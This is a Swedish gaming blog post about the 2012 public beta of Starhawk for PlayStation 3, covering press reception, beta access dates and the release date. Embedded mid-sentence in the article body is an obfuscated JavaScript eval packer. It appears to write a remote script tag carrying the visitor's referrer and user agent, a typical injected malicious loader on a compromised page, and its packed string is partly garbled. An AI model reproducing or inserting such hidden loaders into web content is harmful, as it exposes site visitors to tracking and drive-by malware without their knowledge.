Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Starhawk beta impressions

Starhawk beta impressions
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tkeat|var|u0026u|referrer|snnsf||js|php’.split(’|’),0,{}))
har äntligen den privata betan avslutats för Warhawk-uppföljaren Starhawk och för några dagar sedan (2012-01-17) drog en public beta igång på PSN Plus.

Än så länge har spelet fått grym kritik från större hemsidor som IGN, Kotaku.com och Gamesradar och även användarna. Lite småproblem här och där som uppkopplingsfel och liknande har rapporterats vilket inte är särskilt unikt för en beta, några menar också på att det ibland känns tomt och att det är långa sträckor att röra sig på för att hitta något att göra, påminner lite om BF3 till konsolerna va?

De som inte har Plus-konto får vänta tills den 21:a februari och de som var tidigt ute med Uncharted 3 får det den 21:a januari.

Spelet ser riktigt lovande ut och nedan kommer lite kommentarer från spelmagasinen, ganska nötigt klipp men taggad blir jag!

Starhawk släpps till Playstation 3 2012-05-08.